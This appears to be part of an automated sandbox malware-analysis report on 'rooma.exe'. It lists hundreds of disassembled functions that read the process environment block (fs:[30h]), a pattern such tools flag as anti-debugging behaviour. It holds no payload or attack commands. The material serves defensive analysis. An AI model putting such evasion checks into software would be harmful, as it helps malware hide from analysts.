Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_0161019F mov eax, dword ptr fs:[00000030h] 7_2_0161019F
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_0161019F mov eax, dword ptr fs:[00000030h] 7_2_0161019F
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_0161019F mov eax, dword ptr fs:[00000030h] 7_2_0161019F
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_0161019F mov eax, dword ptr fs:[00000030h] 7_2_0161019F
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_01665060 mov eax, dword ptr fs:[00000030h] 7_2_01665060
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_01592050 mov eax, dword ptr fs:[00000030h] 7_2_01592050
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_015BB052 mov eax, dword ptr fs:[00000030h] 7_2_015BB052
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_0161106E mov eax, dword ptr fs:[00000030h] 7_2_0161106E
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_0160D070 mov ecx, dword ptr fs:[00000030h] 7_2_0160D070
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_015BC073 mov eax, dword ptr fs:[00000030h] 7_2_015BC073
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_015A1070 mov eax, dword ptr fs:[00000030h] 7_2_015A1070
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_015A1070 mov ecx, dword ptr fs:[00000030h] 7_2_015A1070
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_015A1070 mov eax, dword ptr fs:[00000030h] 7_2_015A1070
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_015A1070 mov eax, dword ptr fs:[00000030h] 7_2_015A1070
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_015A1070 mov eax, dword ptr fs:[00000030h] 7_2_015A1070
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_015A1070 mov eax, dword ptr fs:[00000030h] 7_2_015A1070
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_015A1070 mov eax, dword ptr fs:[00000030h] 7_2_015A1070
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_015A1070 mov eax, dword ptr fs:[00000030h] 7_2_015A1070
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_015A1070 mov eax, dword ptr fs:[00000030h] 7_2_015A1070
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_015A1070 mov eax, dword ptr fs:[00000030h] 7_2_015A1070
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_015A1070 mov eax, dword ptr fs:[00000030h] 7_2_015A1070
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_015A1070 mov eax, dword ptr fs:[00000030h] 7_2_015A1070
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_015A1070 mov eax, dword ptr fs:[00000030h] 7_2_015A1070
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_0163705E mov ebx, dword ptr fs:[00000030h] 7_2_0163705E
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_0163705E mov eax, dword ptr fs:[00000030h] 7_2_0163705E
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_015AE016 mov eax, dword ptr fs:[00000030h] 7_2_015AE016
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_015AE016 mov eax, dword ptr fs:[00000030h] 7_2_015AE016
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_015AE016 mov eax, dword ptr fs:[00000030h] 7_2_015AE016
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_015AE016 mov eax, dword ptr fs:[00000030h] 7_2_015AE016
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_0165903E mov eax, dword ptr fs:[00000030h] 7_2_0165903E
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_0165903E mov eax, dword ptr fs:[00000030h] 7_2_0165903E
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_0165903E mov eax, dword ptr fs:[00000030h] 7_2_0165903E
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_0165903E mov eax, dword ptr fs:[00000030h] 7_2_0165903E
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_0158A020 mov eax, dword ptr fs:[00000030h] 7_2_0158A020
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_0158C020 mov eax, dword ptr fs:[00000030h] 7_2_0158C020
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_015B90DB mov eax, dword ptr fs:[00000030h] 7_2_015B90DB
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_015A70C0 mov eax, dword ptr fs:[00000030h] 7_2_015A70C0
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_015A70C0 mov ecx, dword ptr fs:[00000030h] 7_2_015A70C0
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_015A70C0 mov ecx, dword ptr fs:[00000030h] 7_2_015A70C0
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_015A70C0 mov eax, dword ptr fs:[00000030h] 7_2_015A70C0
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_015A70C0 mov ecx, dword ptr fs:[00000030h] 7_2_015A70C0
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_015A70C0 mov ecx, dword ptr fs:[00000030h] 7_2_015A70C0
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_015A70C0 mov eax, dword ptr fs:[00000030h] 7_2_015A70C0
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_015A70C0 mov eax, dword ptr fs:[00000030h] 7_2_015A70C0
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_015A70C0 mov eax, dword ptr fs:[00000030h] 7_2_015A70C0
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_015A70C0 mov eax, dword ptr fs:[00000030h] 7_2_015A70C0
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_015A70C0 mov eax, dword ptr fs:[00000030h] 7_2_015A70C0
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_015A70C0 mov eax, dword ptr fs:[00000030h] 7_2_015A70C0
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_015A70C0 mov eax, dword ptr fs:[00000030h] 7_2_015A70C0
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_015A70C0 mov eax, dword ptr fs:[00000030h] 7_2_015A70C0
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_015A70C0 mov eax, dword ptr fs:[00000030h] 7_2_015A70C0
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_015A70C0 mov eax, dword ptr fs:[00000030h] 7_2_015A70C0
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_015A70C0 mov eax, dword ptr fs:[00000030h] 7_2_015A70C0
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_015A70C0 mov eax, dword ptr fs:[00000030h] 7_2_015A70C0
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_0160D0C0 mov eax, dword ptr fs:[00000030h] 7_2_0160D0C0
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_0160D0C0 mov eax, dword ptr fs:[00000030h] 7_2_0160D0C0
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_0158C0F0 mov eax, dword ptr fs:[00000030h] 7_2_0158C0F0
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_015D20F0 mov ecx, dword ptr fs:[00000030h] 7_2_015D20F0
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_015980E9 mov eax, dword ptr fs:[00000030h] 7_2_015980E9
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_0158A0E3 mov ecx, dword ptr fs:[00000030h] 7_2_0158A0E3
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_016120DE mov eax, dword ptr fs:[00000030h] 7_2_016120DE
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_015B50E4 mov eax, dword ptr fs:[00000030h] 7_2_015B50E4
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_015B50E4 mov ecx, dword ptr fs:[00000030h] 7_2_015B50E4
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_016650D9 mov eax, dword ptr fs:[00000030h] 7_2_016650D9
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_015C909C mov eax, dword ptr fs:[00000030h] 7_2_015C909C
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_015BD090 mov eax, dword ptr fs:[00000030h] 7_2_015BD090
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_015BD090 mov eax, dword ptr fs:[00000030h] 7_2_015BD090
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_01595096 mov eax, dword ptr fs:[00000030h] 7_2_01595096
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_0159208A mov eax, dword ptr fs:[00000030h] 7_2_0159208A
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_0158D08D mov eax, dword ptr fs:[00000030h] 7_2_0158D08D
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_016560B8 mov eax, dword ptr fs:[00000030h] 7_2_016560B8
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_016560B8 mov ecx, dword ptr fs:[00000030h] 7_2_016560B8
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_0164F367 mov eax, dword ptr fs:[00000030h] 7_2_0164F367
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_01589353 mov eax, dword ptr fs:[00000030h] 7_2_01589353
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_01589353 mov eax, dword ptr fs:[00000030h] 7_2_01589353
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_0158D34C mov eax, dword ptr fs:[00000030h] 7_2_0158D34C
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_0158D34C mov eax, dword ptr fs:[00000030h] 7_2_0158D34C
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_0163437C mov eax, dword ptr fs:[00000030h] 7_2_0163437C
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_01665341 mov eax, dword ptr fs:[00000030h] 7_2_01665341
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_01612349 mov eax, dword ptr fs:[00000030h] 7_2_01612349
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_01612349 mov eax, dword ptr fs:[00000030h] 7_2_01612349
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_01612349 mov eax, dword ptr fs:[00000030h] 7_2_01612349
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_01612349 mov eax, dword ptr fs:[00000030h] 7_2_01612349
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_01612349 mov eax, dword ptr fs:[00000030h] 7_2_01612349
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_01612349 mov eax, dword ptr fs:[00000030h] 7_2_01612349
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_01612349 mov eax, dword ptr fs:[00000030h] 7_2_01612349
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_01612349 mov eax, dword ptr fs:[00000030h] 7_2_01612349
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_01612349 mov eax, dword ptr fs:[00000030h] 7_2_01612349
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_01612349 mov eax, dword ptr fs:[00000030h] 7_2_01612349
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_01612349 mov eax, dword ptr fs:[00000030h] 7_2_01612349
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_01612349 mov eax, dword ptr fs:[00000030h] 7_2_01612349
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_01612349 mov eax, dword ptr fs:[00000030h] 7_2_01612349
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_01612349 mov eax, dword ptr fs:[00000030h] 7_2_01612349
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_01612349 mov eax, dword ptr fs:[00000030h] 7_2_01612349
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_01597370 mov eax, dword ptr fs:[00000030h] 7_2_01597370
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_01597370 mov eax, dword ptr fs:[00000030h] 7_2_01597370
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_01597370 mov eax, dword ptr fs:[00000030h] 7_2_01597370
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_0165A352 mov eax, dword ptr fs:[00000030h] 7_2_0165A352
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_0161035C mov eax, dword ptr fs:[00000030h] 7_2_0161035C
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_0161035C mov eax, dword ptr fs:[00000030h] 7_2_0161035C
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_0161035C mov eax, dword ptr fs:[00000030h] 7_2_0161035C
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_0161035C mov ecx, dword ptr fs:[00000030h] 7_2_0161035C
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_0161035C mov eax, dword ptr fs:[00000030h] 7_2_0161035C
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_0161035C mov eax, dword ptr fs:[00000030h] 7_2_0161035C
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_0158C310 mov ecx, dword ptr fs:[00000030h] 7_2_0158C310
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_0165132D mov eax, dword ptr fs:[00000030h] 7_2_0165132D
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_0165132D mov eax, dword ptr fs:[00000030h] 7_2_0165132D
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_015B0310 mov ecx, dword ptr fs:[00000030h] 7_2_015B0310
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_015CA30B mov eax, dword ptr fs:[00000030h] 7_2_015CA30B
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_015CA30B mov eax, dword ptr fs:[00000030h] 7_2_015CA30B
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_015CA30B mov eax, dword ptr fs:[00000030h] 7_2_015CA30B
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_01587330 mov eax, dword ptr fs:[00000030h] 7_2_01587330
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_0161930B mov eax, dword ptr fs:[00000030h] 7_2_0161930B
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_0161930B mov eax, dword ptr fs:[00000030h] 7_2_0161930B
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_0161930B mov eax, dword ptr fs:[00000030h] 7_2_0161930B
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_015BF32A mov eax, dword ptr fs:[00000030h] 7_2_015BF32A
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_0164F3E6 mov eax, dword ptr fs:[00000030h] 7_2_0164F3E6
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_0159A3C0 mov eax, dword ptr fs:[00000030h] 7_2_0159A3C0
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_0159A3C0 mov eax, dword ptr fs:[00000030h] 7_2_0159A3C0
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_0159A3C0 mov eax, dword ptr fs:[00000030h] 7_2_0159A3C0
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_0159A3C0 mov eax, dword ptr fs:[00000030h] 7_2_0159A3C0
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_0159A3C0 mov eax, dword ptr fs:[00000030h] 7_2_0159A3C0
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_0159A3C0 mov eax, dword ptr fs:[00000030h] 7_2_0159A3C0
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_015983C0 mov eax, dword ptr fs:[00000030h] 7_2_015983C0
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_015983C0 mov eax, dword ptr fs:[00000030h] 7_2_015983C0
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_015983C0 mov eax, dword ptr fs:[00000030h] 7_2_015983C0
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_015983C0 mov eax, dword ptr fs:[00000030h] 7_2_015983C0
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_016653FC mov eax, dword ptr fs:[00000030h] 7_2_016653FC
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_015C63FF mov eax, dword ptr fs:[00000030h] 7_2_015C63FF
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_0164C3CD mov eax, dword ptr fs:[00000030h] 7_2_0164C3CD
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_015AE3F0 mov eax, dword ptr fs:[00000030h] 7_2_015AE3F0
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_015AE3F0 mov eax, dword ptr fs:[00000030h] 7_2_015AE3F0
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_015AE3F0 mov eax, dword ptr fs:[00000030h] 7_2_015AE3F0
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_015A03E9 mov eax, dword ptr fs:[00000030h] 7_2_015A03E9
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_015A03E9 mov eax, dword ptr fs:[00000030h] 7_2_015A03E9
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_015A03E9 mov eax, dword ptr fs:[00000030h] 7_2_015A03E9
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_015A03E9 mov eax, dword ptr fs:[00000030h] 7_2_015A03E9
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_015A03E9 mov eax, dword ptr fs:[00000030h] 7_2_015A03E9
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_015A03E9 mov eax, dword ptr fs:[00000030h] 7_2_015A03E9
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_015A03E9 mov eax, dword ptr fs:[00000030h] 7_2_015A03E9
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_015A03E9 mov eax, dword ptr fs:[00000030h] 7_2_015A03E9
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_0164B3D0 mov ecx, dword ptr fs:[00000030h] 7_2_0164B3D0
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_015E739A mov eax, dword ptr fs:[00000030h] 7_2_015E739A
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_015E739A mov eax, dword ptr fs:[00000030h] 7_2_015E739A
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_01588397 mov eax, dword ptr fs:[00000030h] 7_2_01588397
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_01588397 mov eax, dword ptr fs:[00000030h] 7_2_01588397
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_01588397 mov eax, dword ptr fs:[00000030h] 7_2_01588397
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_0158E388 mov eax, dword ptr fs:[00000030h] 7_2_0158E388
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_0158E388 mov eax, dword ptr fs:[00000030h] 7_2_0158E388
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_0158E388 mov eax, dword ptr fs:[00000030h] 7_2_0158E388
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_015B438F mov eax, dword ptr fs:[00000030h] 7_2_015B438F
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_015B438F mov eax, dword ptr fs:[00000030h] 7_2_015B438F
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_0166539D mov eax, dword ptr fs:[00000030h] 7_2_0166539D
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_015C33A0 mov eax, dword ptr fs:[00000030h] 7_2_015C33A0
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_015C33A0 mov eax, dword ptr fs:[00000030h] 7_2_015C33A0
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_015B33A5 mov eax, dword ptr fs:[00000030h] 7_2_015B33A5
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_01596259 mov eax, dword ptr fs:[00000030h] 7_2_01596259
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_0158A250 mov eax, dword ptr fs:[00000030h] 7_2_0158A250
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_0165D26B mov eax, dword ptr fs:[00000030h] 7_2_0165D26B
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_0165D26B mov eax, dword ptr fs:[00000030h] 7_2_0165D26B
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_01640274 mov eax, dword ptr fs:[00000030h] 7_2_01640274
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_01640274 mov eax, dword ptr fs:[00000030h] 7_2_01640274
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_01640274 mov eax, dword ptr fs:[00000030h] 7_2_01640274
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_01640274 mov eax, dword ptr fs:[00000030h] 7_2_01640274
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_01640274 mov eax, dword ptr fs:[00000030h] 7_2_01640274
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_01640274 mov eax, dword ptr fs:[00000030h] 7_2_01640274
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_01640274 mov eax, dword ptr fs:[00000030h] 7_2_01640274
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_01640274 mov eax, dword ptr fs:[00000030h] 7_2_01640274
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_01640274 mov eax, dword ptr fs:[00000030h] 7_2_01640274
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_01640274 mov eax, dword ptr fs:[00000030h] 7_2_01640274
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_01640274 mov eax, dword ptr fs:[00000030h] 7_2_01640274
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_01640274 mov eax, dword ptr fs:[00000030h] 7_2_01640274
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_015C724D mov eax, dword ptr fs:[00000030h] 7_2_015C724D
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_01589240 mov eax, dword ptr fs:[00000030h] 7_2_01589240
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_01589240 mov eax, dword ptr fs:[00000030h] 7_2_01589240
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_015D1270 mov eax, dword ptr fs:[00000030h] 7_2_015D1270
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_015D1270 mov eax, dword ptr fs:[00000030h] 7_2_015D1270
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_015B9274 mov eax, dword ptr fs:[00000030h] 7_2_015B9274
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_0164B256 mov eax, dword ptr fs:[00000030h] 7_2_0164B256
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_0164B256 mov eax, dword ptr fs:[00000030h] 7_2_0164B256
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_0158826B mov eax, dword ptr fs:[00000030h] 7_2_0158826B
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_01594260 mov eax, dword ptr fs:[00000030h] 7_2_01594260
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_01594260 mov eax, dword ptr fs:[00000030h] 7_2_01594260
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_01594260 mov eax, dword ptr fs:[00000030h] 7_2_01594260
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_01665227 mov eax, dword ptr fs:[00000030h] 7_2_01665227
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_015C7208 mov eax, dword ptr fs:[00000030h] 7_2_015C7208
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_015C7208 mov eax, dword ptr fs:[00000030h] 7_2_015C7208
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_0158823B mov eax, dword ptr fs:[00000030h] 7_2_0158823B
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_016652E2 mov eax, dword ptr fs:[00000030h] 7_2_016652E2
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_016412ED mov eax, dword ptr fs:[00000030h] 7_2_016412ED
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_016412ED mov eax, dword ptr fs:[00000030h] 7_2_016412ED
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_016412ED mov eax, dword ptr fs:[00000030h] 7_2_016412ED
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_016412ED mov eax, dword ptr fs:[00000030h] 7_2_016412ED
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_016412ED mov eax, dword ptr fs:[00000030h] 7_2_016412ED
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_016412ED mov eax, dword ptr fs:[00000030h] 7_2_016412ED
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_016412ED mov eax, dword ptr fs:[00000030h] 7_2_016412ED
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_016412ED mov eax, dword ptr fs:[00000030h] 7_2_016412ED
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_016412ED mov eax, dword ptr fs:[00000030h] 7_2_016412ED
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_016412ED mov eax, dword ptr fs:[00000030h] 7_2_016412ED
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_016412ED mov eax, dword ptr fs:[00000030h] 7_2_016412ED
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_016412ED mov eax, dword ptr fs:[00000030h] 7_2_016412ED
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_016412ED mov eax, dword ptr fs:[00000030h] 7_2_016412ED
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_016412ED mov eax, dword ptr fs:[00000030h] 7_2_016412ED
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_015BF2D0 mov eax, dword ptr fs:[00000030h] 7_2_015BF2D0
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_015BF2D0 mov eax, dword ptr fs:[00000030h] 7_2_015BF2D0
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_0158B2D3 mov eax, dword ptr fs:[00000030h] 7_2_0158B2D3
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_0158B2D3 mov eax, dword ptr fs:[00000030h] 7_2_0158B2D3
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_0158B2D3 mov eax, dword ptr fs:[00000030h] 7_2_0158B2D3
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_0159A2C3 mov eax, dword ptr fs:[00000030h] 7_2_0159A2C3
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_0159A2C3 mov eax, dword ptr fs:[00000030h] 7_2_0159A2C3
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_0159A2C3 mov eax, dword ptr fs:[00000030h] 7_2_0159A2C3
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_0159A2C3 mov eax, dword ptr fs:[00000030h] 7_2_0159A2C3
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_0159A2C3 mov eax, dword ptr fs:[00000030h] 7_2_0159A2C3
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_015BB2C0 mov eax, dword ptr fs:[00000030h] 7_2_015BB2C0
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_015BB2C0 mov eax, dword ptr fs:[00000030h] 7_2_015BB2C0
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_015BB2C0 mov eax, dword ptr fs:[00000030h] 7_2_015BB2C0
